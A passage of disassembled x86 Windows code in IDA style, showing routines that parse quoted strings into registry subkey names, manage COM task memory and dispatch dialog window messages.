jnz short loc_401AB3
push eax
lea ecx, [esp+14h+arg_0]
call sub_401D60
jmp short loc_401B22
; ---------------------------------------------------------------------------
loc_401AB3: ; CODE XREF: sub_401A30+75�j
push 25h ; char
push eax ; lpsz
call sub_401F50
mov ebp, eax
add esp, 8
test ebp, ebp
jz loc_401C05
mov ecx, [esi]
sub eax, ecx
cmp eax, 1Fh
jg loc_401BFB
inc eax
push eax ; iMaxLength
lea eax, [esp+14h+String2]
push ecx ; lpString2
push eax ; lpString1
call ds:lstrcpynA ; lstrcpynA
lea ecx, [esp+10h+String2]
push ecx ; lpString2
mov ecx, [esi+4]
call sub_401E70
test eax, eax
jz loc_401C05
push eax ; lpWideCharStr
lea ecx, [esp+14h+arg_0]
call sub_401DC0
cmp [esi], ebp
jz short loc_401B22
loc_401B06: ; CODE XREF: sub_401A30+DF�j
mov edx, [esi]
push edx ; lpsz
call ebx ; CharNextA
cmp eax, ebp
mov [esi], eax
jnz short loc_401B06
jmp short loc_401B22
; ---------------------------------------------------------------------------
loc_401B13: ; CODE XREF: sub_401A30+64�j
lea ecx, [esp+14h+arg_0]
call sub_401D60
mov ebx, ds:CharNextA
loc_401B22: ; CODE XREF: sub_401A30+81�j
; sub_401A30+D4�j ...
mov eax, [esi]
push eax ; lpsz
call ebx ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jnz loc_401A8E
loc_401B33: ; CODE XREF: sub_401A30+58�j
mov ebx, ds:CharNextA
loc_401B39: ; CODE XREF: sub_401A30+1D0�j
; sub_401A30+1DA�j
mov ecx, [esi]
push ecx
lea ecx, [esp+14h+arg_0]
call sub_401D60
test edi, edi
jl short loc_401B59
mov eax, [esp+10h+pv]
mov [esp+10h+pv], 0
mov [esp+10h], eax
loc_401B59: ; CODE XREF: sub_401A30+117�j
mov edx, [esp+10h+pv]
push edx ; pv
call ds:CoTaskMemFree
test edi, edi
jl loc_401D07
mov eax, [esp+10h]
mov [esi], eax
cmp byte ptr [eax], 0
jz loc_401CFC
loc_401B7B: ; CODE XREF: sub_401A30+2AD�j
mov ecx, esi
lea edi, [esp+10h+SubKey]
call sub_401FD0
mov ecx, [esi]
mov al, [ecx]
test al, al
jz loc_401CE2
cmp al, 27h
jnz short loc_401C0F
push ecx ; lpsz
call ebx ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_401BE6
loc_401BA1: ; CODE XREF: sub_401A30+1B4�j
mov ecx, esi
call sub_401D20
test eax, eax
jnz short loc_401BE6
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_401BB8
push eax ; lpsz
call ebx ; CharNextA
mov [esi], eax
loc_401BB8: ; CODE XREF: sub_401A30+181�j
mov ebp, [esi]
push ebp ; lpsz
call ebx ; CharNextA
lea ecx, [edi+2]
lea edx, [esp+10h+arg_102C]
cmp ecx, edx
mov [esi], eax
jnb loc_401CE2
cmp ebp, eax
jnb short loc_401BE1
mov ecx, ebp
loc_401BD7: ; CODE XREF: sub_401A30+1AF�j
mov dl, [ecx]
inc ecx
mov [edi], dl
inc edi
cmp ecx, eax
jb short loc_401BD7
loc_401BE1: ; CODE XREF: sub_401A30+1A3�j
cmp byte ptr [eax], 0
jnz short loc_401BA1
loc_401BE6: ; CODE XREF: sub_401A30+16F�j
; sub_401A30+17A�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz loc_401CE2
push eax ; lpsz
mov byte ptr [edi], 0
call ebx ; CharNextA
mov [esi], eax
jmp short loc_401C3B
; ---------------------------------------------------------------------------
loc_401BFB: ; CODE XREF: sub_401A30+9F�j
mov edi, 80004005h
jmp loc_401B39
; ---------------------------------------------------------------------------
loc_401C05: ; CODE XREF: sub_401A30+92�j
; sub_401A30+C2�j
mov edi, 80020009h
jmp loc_401B39
; ---------------------------------------------------------------------------
loc_401C0F: ; CODE XREF: sub_401A30+164�j
; sub_401A30+206�j
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_401C38
mov ebp, [esi]
push ebp ; lpsz
call ebx ; CharNextA
cmp ebp, eax
mov [esi], eax
jnb short loc_401C32
mov ecx, ebp
loc_401C28: ; CODE XREF: sub_401A30+200�j
mov dl, [ecx]
inc ecx
mov [edi], dl
inc edi
cmp ecx, eax
jb short loc_401C28
loc_401C32: ; CODE XREF: sub_401A30+1F4�j
mov al, [eax]
test al, al
jnz short loc_401C0F
loc_401C38: ; CODE XREF: sub_401A30+1E9�j
mov byte ptr [edi], 0
loc_401C3B: ; CODE XREF: sub_401A30+1C9�j
lea eax, [esp+10h+SubKey]
push eax ; lpString1
call sub_401F10
mov ebp, eax
add esp, 4
test ebp, ebp
jz loc_401CE2
lea ecx, [esp+10h+SubKey]
push ecx
mov ecx, esi
call sub_402020
mov edi, eax
test edi, edi
jl loc_401CFC
cmp [esp+10h+SubKey], 7Bh
jnz short loc_401CE2
mov eax, [esp+10h+arg_1034]
test eax, eax
jz short loc_401C9A
mov ebx, [esi]
push 0 ; int
push eax ; int
lea edx, [esp+18h+SubKey]
push ebp ; int
push edx ; lpSubKey
mov ecx, esi
call sub_402370
mov edi, eax
test edi, edi
jl short loc_401CE9
mov ebx, ds:CharNextA
jmp short loc_401CB1
; ---------------------------------------------------------------------------
loc_401C9A: ; CODE XREF: sub_401A30+248�j
push 0 ; int
push 0 ; int
lea eax, [esp+18h+SubKey]
push ebp ; int
push eax ; lpSubKey
mov ecx, esi
call sub_402370
mov edi, eax
test edi, edi
jl short loc_401CFC
loc_401CB1: ; CODE XREF: sub_401A30+268�j
mov ecx, [esi]
mov dl, [ecx]
mov ecx, esi
push edx
call sub_401F80
test eax, eax
jz short loc_401CD6
loc_401CC1: ; CODE XREF: sub_401A30+2A4�j
mov eax, [esi]
push eax ; lpsz
call ebx ; CharNextA
mov [esi], eax
mov cl, [eax]
push ecx
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_401CC1
loc_401CD6: ; CODE XREF: sub_401A30+28F�j
mov edx, [esi]
cmp byte ptr [edx], 0
jz short loc_401CFC
jmp loc_401B7B
; ---------------------------------------------------------------------------
loc_401CE2: ; CODE XREF: sub_401A30+15C�j
; sub_401A30+19B�j ...
mov edi, 80020009h
jmp short loc_401CFC
; ---------------------------------------------------------------------------
loc_401CE9: ; CODE XREF: sub_401A30+260�j
push 0 ; int
push 0 ; int
lea eax, [esp+18h+SubKey]
push ebp ; int
push eax ; lpSubKey
mov ecx, esi
mov [esi], ebx
call sub_402370
loc_401CFC: ; CODE XREF: sub_401A30+145�j
; sub_401A30+232�j ...
mov ecx, [esp+10h]
push ecx ; pv
call ds:CoTaskMemFree
loc_401D07: ; CODE XREF: sub_401A30+136�j
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
add esp, 1030h
retn 8
sub_401A30 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D20 proc near ; CODE XREF: sub_401A30+173�p
; sub_402370+50�p ...
mov eax, [ecx]
cmp byte ptr [eax], 27h
jnz short loc_401D39
push eax ; lpsz
call ds:CharNextA ; CharNextA
cmp byte ptr [eax], 27h
jz short loc_401D39
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_401D39: ; CODE XREF: sub_401D20+5�j
; sub_401D20+11�j
xor eax, eax
retn
sub_401D20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_401D40(SIZE_T cb)
sub_401D40 proc near ; CODE XREF: sub_401A30+2B�p
cb = dword ptr 4
mov eax, [esp+cb]
push esi
mov esi, ecx
push eax ; cb
mov dword ptr [esi], 0
mov [esi+4], eax
call ds:CoTaskMemAlloc
mov [esi+8], eax
mov eax, esi
pop esi
retn 4
sub_401D40 endp
; =============== S U B R O U T I N E =======================================
sub_401D60 proc near ; CODE XREF: sub_401A30+7C�p
; sub_401A30+E7�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
mov ecx, [esi]
cmp ecx, eax
jnz short loc_401D80
add eax, eax
mov [esi+4], eax
push eax ; cb
mov eax, [esi+8]
push eax ; pv
call ds:CoTaskMemRealloc
mov [esi+8], eax
loc_401D80: ; CODE XREF: sub_401D60+B�j
mov edi, [esp+8+arg_0]
mov ecx, [esi+8]
mov edx, [esi]
mov al, [edi]
mov [ecx+edx], al
mov eax, [esi]
inc eax
mov [esi], eax
mov cl, [edi]
push ecx ; TestChar
call ds:IsDBCSLeadByte ; IsDBCSLeadByte
test eax, eax
jz short loc_401DB0
mov edx, [esi+8]
mov eax, [esi]
mov cl, [edi+1]
mov [edx+eax], cl
mov eax, [esi]
inc eax
mov [esi], eax
loc_401DB0: ; CODE XREF: sub_401D60+3E�j
pop edi
mov eax, 1
pop esi
retn 4
sub_401D60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_401DC0(LPCWSTR lpWideCharStr)
sub_401DC0 proc near ; CODE XREF: sub_401A30+CD�p
lpWideCharStr = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+lpWideCharStr]
push ebx
push esi
push edi
test eax, eax
mov esi, ecx
jnz short loc_401DD3
xor edi, edi
jmp short loc_401E05
; ---------------------------------------------------------------------------
loc_401DD3: ; CODE XREF: sub_401DC0+D�j
push eax ; lpString
call ds:lstrlenW ; lstrlenW
lea ebx, [eax+eax+2]
mov eax, ebx
add eax, 3
and al, 0FCh
call sub_40AF70
mov eax, [ebp+lpWideCharStr]
mov edi, esp
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push ebx ; cbMultiByte
push edi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push eax ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
mov byte ptr [edi], 0
call ds:WideCharToMultiByte ; WideCharToMultiByte
loc_401E05: ; CODE XREF: sub_401DC0+11�j
cmp byte ptr [edi], 0
jz short loc_401E5C
mov ebx, ds:CoTaskMemRealloc
loc_401E10: ; CODE XREF: sub_401DC0+9A�j
mov eax, [esi+4]
mov ecx, [esi]
cmp ecx, eax
jnz short loc_401E28
mov ecx, [esi+8]
add eax, eax
push eax ; cb
push ecx ; pv
mov [esi+4], eax
call ebx ; CoTaskMemRealloc
mov [esi+8], eax
loc_401E28: ; CODE XREF: sub_401DC0+57�j
mov edx, [esi+8]
mov eax, [esi]
mov cl, [edi]
mov [edx+eax], cl
mov ecx, [esi]
inc ecx
mov [esi], ecx
mov dl, [edi]
push edx ; TestChar
call ds:IsDBCSLeadByte ; IsDBCSLeadByte
test eax, eax
jz short loc_401E54
mov eax, [esi+8]
mov ecx, [esi]
mov dl, [edi+1]
mov [eax+ecx], dl
mov eax, [esi]
inc eax
mov [esi], eax
loc_401E54: ; CODE XREF: sub_401DC0+82�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_401E10
loc_401E5C: ; CODE XREF: sub_401DC0+48�j
lea esp, [ebp-0Ch]
mov eax, 1
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_401DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_401E70(LPCSTR lpString2)
sub_401E70 proc near ; CODE XREF: sub_401A30+BB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
lpString2 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ecx+4]
push ebx
push esi
push edi
xor edi, edi
mov [ebp+var_4], ecx
test eax, eax
mov [ebp+var_8], edi
jle short loc_401EE9
jmp short loc_401E8D
; ---------------------------------------------------------------------------
loc_401E8A: ; CODE XREF: sub_401E70+77�j
mov ecx, [ebp+var_4]
loc_401E8D: ; CODE XREF: sub_401E70+18�j
mov eax, [ecx]
mov ecx, [eax+edi*4]
mov ebx, [ecx]
test ebx, ebx
jnz short loc_401E9C
xor esi, esi
jmp short loc_401ECE
; ---------------------------------------------------------------------------
loc_401E9C: ; CODE XREF: sub_401E70+26�j
push ebx ; lpString
call ds:lstrlenW ; lstrlenW
lea edi, [eax+eax+2]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_40AF70
mov esi, esp
push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push edi ; cbMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push ebx ; lpWideCharStr
push 0 ; dwFlags
push 0 ; CodePage
mov byte ptr [esi], 0
call ds:WideCharToMultiByte ; WideCharToMultiByte
mov edi, [ebp+var_8]
loc_401ECE: ; CODE XREF: sub_401E70+2A�j
mov edx, [ebp+lpString2]
push edx ; lpString2
push esi ; lpString1
call ds:lstrcmpiA ; lstrcmpiA
test eax, eax
jz short loc_401EF7
mov eax, [ebp+var_4]
inc edi
mov [ebp+var_8], edi
cmp edi, [eax+4]
jl short loc_401E8A
loc_401EE9: ; CODE XREF: sub_401E70+16�j
xor eax, eax
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_401EF7: ; CODE XREF: sub_401E70+6B�j
mov ecx, [ebp+var_4]
lea esp, [ebp-14h]
mov edx, [ecx]
mov eax, [edx+edi*4]
pop edi
pop esi
pop ebx
mov eax, [eax+4]
mov esp, ebp
pop ebp
retn 4
sub_401E70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401F10(LPCSTR lpString1)
sub_401F10 proc near ; CODE XREF: sub_401A30+210�p
lpString1 = dword ptr 4
push ebx
mov ebx, [esp+4+lpString1]
push ebp
mov ebp, ds:lstrcmpiA
push esi
push edi
xor edi, edi
mov esi, offset off_40D6A8
loc_401F25: ; CODE XREF: sub_401F10+29�j
mov eax, [esi]
push eax ; lpString2
push ebx ; lpString1
call ebp ; lstrcmpiA
test eax, eax
jz short loc_401F42
add esi, 8
inc edi
cmp esi, offset byte_40D718
jl short loc_401F25
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401F42: ; CODE XREF: sub_401F10+1D�j
mov eax, ds:dword_40D6AC[edi*8]
pop edi
pop esi
pop ebp
pop ebx
retn
sub_401F10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401F50(LPCSTR lpsz,char)
sub_401F50 proc near ; CODE XREF: sub_401A30+86�p
lpsz = dword ptr 4
arg_4 = byte ptr 8
mov eax, [esp+lpsz]
push ebx
push esi
push edi
mov cl, [eax]
xor edi, edi
test cl, cl
jz short loc_401F76
mov bl, [esp+0Ch+arg_4]
mov esi, ds:CharNextA
loc_401F69: ; CODE XREF: sub_401F50+24�j
cmp cl, bl
jz short loc_401F78
push eax ; lpsz
call esi ; CharNextA
mov cl, [eax]
test cl, cl
jnz short loc_401F69
loc_401F76: ; CODE XREF: sub_401F50+D�j
mov eax, edi
loc_401F78: ; CODE XREF: sub_401F50+1B�j
pop edi
pop esi
pop ebx
retn
sub_401F50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401F80 proc near ; CODE XREF: sub_401A30+1E2�p
; sub_401A30+288�p ...
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
add eax, 0FFFFFFF7h
cmp eax, 17h ; switch 24 cases
ja short loc_401FA4 ; default
; jumptable 00401F95 cases 2,3,5-22
xor ecx, ecx
mov cl, ds:byte_401FB4[eax]
jmp ds:off_401FAC[ecx*4] ; switch jump
loc_401F9C: ; DATA XREF: .text:off_401FAC�o
mov eax, 1 ; jumptable 00401F95 cases 0,1,4,23
retn 4
; ---------------------------------------------------------------------------
loc_401FA4: ; CODE XREF: sub_401F80+B�j
; sub_401F80+15�j
; DATA XREF: ...
xor eax, eax ; default
; jumptable 00401F95 cases 2,3,5-22
retn 4
sub_401F80 endp
; ---------------------------------------------------------------------------
align 4
off_401FAC dd offset loc_401F9C ; DATA XREF: sub_401F80+15�r
dd offset loc_401FA4 ; jump table for switch statement
byte_401FB4 db 0, 0, 1, 1 ; DATA XREF: sub_401F80+F�r
db 0, 1, 1, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 0
align 10h
; =============== S U B R O U T I N E =======================================
sub_401FD0 proc near ; CODE XREF: sub_401A30+151�p
; sub_402370+2A�p ...
push esi
push edi
mov edi, ds:CharNextA
mov esi, ecx
loc_401FDA: ; CODE XREF: sub_401FD0+2B�j
mov eax, [esi]
movsx ecx, byte ptr [eax]
add ecx, 0FFFFFFF7h
cmp ecx, 17h ; switch 24 cases
ja short loc_401FFD ; default
; jumptable 00401FEF cases 2,3,5-22
xor edx, edx
mov dl, ds:byte_402008[ecx]
jmp ds:off_402000[edx*4] ; switch jump
loc_401FF6: ; DATA XREF: .text:off_402000�o
push eax ; jumptable 00401FEF cases 0,1,4,23
call edi ; CharNextA
mov [esi], eax
jmp short loc_401FDA
; ---------------------------------------------------------------------------
loc_401FFD: ; CODE XREF: sub_401FD0+15�j
; sub_401FD0+1F�j
; DATA XREF: ...
pop edi ; default
; jumptable 00401FEF cases 2,3,5-22
pop esi
retn
sub_401FD0 endp
; ---------------------------------------------------------------------------
off_402000 dd offset loc_401FF6 ; DATA XREF: sub_401FD0+1F�r
dd offset loc_401FFD ; jump table for switch statement
byte_402008 db 0, 0, 1, 1 ; DATA XREF: sub_401FD0+19�r
db 0, 1, 1, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 0
; =============== S U B R O U T I N E =======================================
sub_402020 proc near ; CODE XREF: sub_401A30+229�p
; sub_402370+3E1�p ...
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, ds:CharNextA
push esi
push edi
mov esi, ecx
loc_40202C: ; CODE XREF: sub_402020+2D�j
mov eax, [esi]
movsx ecx, byte ptr [eax]
add ecx, 0FFFFFFF7h
cmp ecx, 17h ; switch 24 cases
ja short loc_40204F ; default
; jumptable 00402041 cases 2,3,5-22
xor edx, edx
mov dl, ds:byte_40213C[ecx]
jmp ds:off_402134[edx*4] ; switch jump
loc_402048: ; DATA XREF: .text:off_402134�o
push eax ; jumptable 00402041 cases 0,1,4,23
call ebp ; CharNextA
mov [esi], eax
jmp short loc_40202C
; ---------------------------------------------------------------------------
loc_40204F: ; CODE XREF: sub_402020+17�j
; sub_402020+21�j
; DATA XREF: ...
mov edi, [esi] ; default
; jumptable 00402041 cases 2,3,5-22
mov al, [edi]
test al, al
jnz short loc_402063
pop edi
pop esi
pop ebp
mov eax, 80020009h
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_402063: ; CODE XREF: sub_402020+35�j
mov ebx, [esp+10h+arg_0]
cmp al, 27h
jnz loc_4020F0
push edi ; lpsz
mov [esp+14h+arg_0], ebx
call ebp ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_4020CA
loc_40207E: ; CODE XREF: sub_402020+A8�j
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_40208D
push eax ; lpsz
call ebp ; CharNextA
cmp byte ptr [eax], 27h
jnz short loc_4020CA
loc_40208D: ; CODE XREF: sub_402020+63�j
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_402099
push eax ; lpsz
call ebp ; CharNextA
mov [esi], eax
loc_402099: ; CODE XREF: sub_402020+72�j
mov edi, [esi]
push edi ; lpsz
call ebp ; CharNextA
mov ecx, [esp+10h+arg_0]
lea edx, [ebx+2]
add ecx, 1000h
mov [esi], eax
cmp edx, ecx
jnb short loc_4020D1
cmp edi, eax
jnb short loc_4020C3
mov eax, edi
loc_4020B7: ; CODE XREF: sub_402020+A1�j
mov cl, [eax]
inc eax
mov [ebx], cl
mov ecx, [esi]
inc ebx
cmp eax, ecx
jb short loc_4020B7
loc_4020C3: ; CODE XREF: sub_402020+93�j
mov edx, [esi]
cmp byte ptr [edx], 0
jnz short loc_40207E
loc_4020CA: ; CODE XREF: sub_402020+5C�j
; sub_402020+6B�j
mov eax, [esi]
cmp byte ptr [eax], 0
jnz short loc_4020DD
loc_4020D1: ; CODE XREF: sub_402020+8F�j
pop edi
pop esi
pop ebp
mov eax, 80020009h
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_4020DD: ; CODE XREF: sub_402020+AF�j
mov byte ptr [ebx], 0
mov ecx, [esi]
push ecx ; lpsz
call ebp ; CharNextA
mov [esi], eax
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_4020F0: ; CODE XREF: sub_402020+49�j
; sub_402020+105�j
movsx eax, al
add eax, 0FFFFFFF7h
cmp eax, 17h ; switch 24 cases
ja short loc_40210A ; default
; jumptable 00402103 cases 2,3,5-22
xor edx, edx
mov dl, ds:byte_40215C[eax]
jmp ds:off_402154[edx*4] ; switch jump
loc_40210A: ; CODE XREF: sub_402020+D9�j
; DATA XREF: .text:off_402154�o
push edi ; default
; jumptable 00402103 cases 2,3,5-22
call ebp ; CharNextA
cmp edi, eax
mov [esi], eax
jnb short loc_40211F
loc_402113: ; CODE XREF: sub_402020+FD�j
mov al, [edi]
inc edi
mov [ebx], al
mov eax, [esi]
inc ebx
cmp edi, eax
jb short loc_402113
loc_40211F: ; CODE XREF: sub_402020+F1�j
mov edi, [esi]
mov al, [edi]
test al, al
jnz short loc_4020F0
loc_402127: ; CODE XREF: sub_402020+E3�j
; DATA XREF: .text:off_402154�o
pop edi ; jumptable 00402103 cases 0,1,4,23
pop esi
mov byte ptr [ebx], 0
pop ebp
xor eax, eax
pop ebx
retn 4
sub_402020 endp
; ---------------------------------------------------------------------------
align 4
off_402134 dd offset loc_402048 ; DATA XREF: sub_402020+21�r
dd offset loc_40204F ; jump table for switch statement
byte_40213C db 0, 0, 1, 1 ; DATA XREF: sub_402020+1B�r
db 0, 1, 1, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 0
off_402154 dd offset loc_402127 ; DATA XREF: sub_402020+E3�r
dd offset loc_40210A ; jump table for switch statement
byte_40215C db 0, 0, 1, 1 ; DATA XREF: sub_402020+DD�r
db 0, 1, 1, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 0
align 10h
; =============== S U B R O U T I N E =======================================
sub_402180 proc near ; DATA XREF: .rdata:off_40D698�o
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_14]
push esi
test eax, eax
jnz loc_40235B
mov eax, [esp+4+arg_4]
cmp eax, 110h
jnz short loc_4021D2
mov edx, [esp+4+arg_C]
lea eax, [esp+4+arg_14]
push eax ; int
mov eax, [esp+8+arg_8]
push edx ; int
mov esi, 1
push eax ; int
push 110h ; int
mov [esp+14h+arg_14], esi
call sub_405C90
mov ecx, [esp+4+arg_10]
mov [ecx], eax
mov eax, [esp+4+arg_14]
test eax, eax
jz loc_40235B
mov eax, esi
pop esi
retn 18h
; ---------------------------------------------------------------------------
loc_4021D2: ; CODE XREF: sub_402180+16�j
cmp eax, 111h
jnz short loc_402217
mov eax, [esp+4+arg_8]
mov esi, 1
cmp ax, si
jnz short loc_402253
lea edx, [esp+4+arg_14]
mov [esp+4+arg_14], esi
push edx
mov edx, [esp+8+arg_C]
push edx
push esi
shr eax, 10h
push eax
call sub_4064E0
mov ecx, [esp+4+arg_10]
mov [ecx], eax
mov eax, [esp+4+arg_14]
test eax, eax
jz loc_40235B
mov eax, esi
pop esi
retn 18h
; ---------------------------------------------------------------------------
loc_402217: ; CODE XREF: sub_402180+57�j
cmp eax, 10h
jnz short loc_40229A
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx
mov edx, [esp+8+arg_8]
push eax
mov esi, 1
push edx
push 10h
mov [esp+14h+arg_14], esi
call sub_406D00
mov ecx, [esp+4+arg_10]
mov [ecx], eax
mov eax, [esp+4+arg_14]
test eax, eax
jz loc_40235B
mov eax, esi
pop esi
retn 18h
; ---------------------------------------------------------------------------
loc_402253: ; CODE XREF: sub_402180+65�j
cmp ax, 0C9h
jnz loc_4022DF
shr eax, 10h
cmp ax, si
jnz loc_40235B
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx ; int
push eax ; int
push 0C9h ; int
push esi ; int
mov [esp+14h+arg_14], esi
call sub_406D50
mov ecx, [esp+4+arg_10]
mov [ecx], eax
mov eax, [esp+4+arg_14]
test eax, eax
jz loc_40235B
mov eax, esi
pop esi
retn 18h
; ---------------------------------------------------------------------------
loc_40229A: ; CODE XREF: sub_402180+9A�j
cmp eax, 113h
jnz loc_40235B
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx ; int
mov edx, [esp+8+arg_8]
push eax ; int
mov esi, 1
push edx ; int
push 113h ; int
mov [esp+14h+arg_14], esi
call sub_406720
mov ecx, [esp+4+arg_10]
mov [ecx], eax
mov eax, [esp+4+arg_14]
test eax, eax
jz loc_40235B
mov eax, esi
pop esi
retn 18h
; ---------------------------------------------------------------------------
loc_4022DF: ; CODE XREF: sub_402180+D7�j
cmp ax, 0CEh
jnz short loc_40231F
shr eax, 10h
cmp ax, 400h
jnz short loc_40235B
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx
push eax
push 0CEh
push 400h
mov [esp+14h+arg_14], esi
call sub_406E00
mov ecx, [esp+4+arg_10]
mov [ecx], eax
mov eax, [esp+4+arg_14]
test eax, eax
jz short loc_40235B
mov eax, esi
pop esi
retn 18h
; ---------------------------------------------------------------------------
loc_40231F: ; CODE XREF: sub_402180+163�j
cmp ax, 0D1h
jnz short loc_40235B
shr eax, 10h
test ax, ax
jnz short loc_40235B
mov eax, [esp+4+arg_C]
lea edx, [esp+4+arg_14]
push edx
push eax
push 0D1h
push 0
mov [esp+14h+arg_14], esi
call sub_406E50
mov ecx, [esp+4+arg_10]
mov [ecx], eax
mov eax, [esp+4+arg_14]
test eax, eax
jz short loc_40235B
mov eax, esi
pop esi
retn 18h
; ---------------------------------------------------------------------------
loc_40235B: ; CODE XREF: sub_402180+7�j
; sub_402180+46�j ...
xor eax, eax
pop esi
retn 18h
sub_402180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_402370(LPCSTR lpSubKey,int,int,int)
sub_402370 proc near ; CODE XREF: sub_401A30+257�p
; sub_401A30+276�p ...
var_222C = byte ptr -222Ch
var_122C = byte ptr -122Ch
SubKey = byte ptr -22Ch
ValueName = byte ptr -12Ch
ftLastWriteTime = _FILETIME ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
cchName = dword ptr -14h
lpString1 = dword ptr -10h
hKey = dword ptr -0Ch
var_8 = dword ptr -8
cchValueName = dword ptr -4
lpSubKey = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_ECC = byte ptr 0ED4h
push ebp
mov ebp, esp
mov eax, 222Ch
call sub_40AF70
xor eax, eax
push ebx
mov [ebp+cchValueName], eax
mov [ebp+lpString1], eax
mov eax, [ebp+arg_C]
push esi
push edi
mov edi, [ebp+lpSubKey]
mov esi, ecx
mov [ebp+var_18], 1
mov [ebp+var_20], eax
call sub_401FD0
mov ecx, [esi]
mov al, [ecx]
test al, al
jz loc_402D9D
cmp al, 27h
jnz short loc_40242C
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
mov cl, [eax]
test cl, cl
jz short loc_402411
loc_4023BE: ; CODE XREF: sub_402370+9F�j
mov ecx, esi
call sub_401D20
test eax, eax
jnz short loc_402411
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_4023D9
push eax ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
loc_4023D9: ; CODE XREF: sub_402370+5E�j
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
mov ecx, [ebp+lpSubKey]
lea edx, [edi+2]
add ecx, 1000h
mov [esi], eax
cmp edx, ecx
jnb loc_402D9D
cmp ebx, eax
jnb short loc_40240A
mov eax, ebx
loc_4023FE: ; CODE XREF: sub_402370+98�j
mov cl, [eax]
inc eax
mov [edi], cl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_4023FE
loc_40240A: ; CODE XREF: sub_402370+8A�j
mov edx, [esi]
cmp byte ptr [edx], 0
jnz short loc_4023BE
loc_402411: ; CODE XREF: sub_402370+4C�j
; sub_402370+57�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz loc_402D9D
mov byte ptr [edi], 0
mov ecx, [esi]
push ecx ; lpsz
call ds:CharNextA ; CharNextA
mov [esi], eax
jmp short loc_402460
; ---------------------------------------------------------------------------
loc_40242C: ; CODE XREF: sub_402370+3D�j
; sub_402370+EB�j
push eax
mov ecx, esi
call sub_401F80
test eax, eax
jnz short loc_40245D
mov ebx, [esi]
push ebx ; lpsz
call ds:CharNextA ; CharNextA
cmp ebx, eax
mov [esi], eax
jnb short loc_402455
mov eax, ebx
loc_402449: ; CODE XREF: sub_402370+E3�j
mov dl, [eax]
inc eax
mov [edi], dl
mov ecx, [esi]
inc edi
cmp eax, ecx
jb short loc_402449
loc_402455: ; CODE XREF: sub_402370+D5�j
mov eax, [esi]
mov al, [eax]
test al, al
jnz short loc_40242C
loc_40245D: ; CODE XREF: sub_402370+C6�j
mov byte ptr [edi], 0
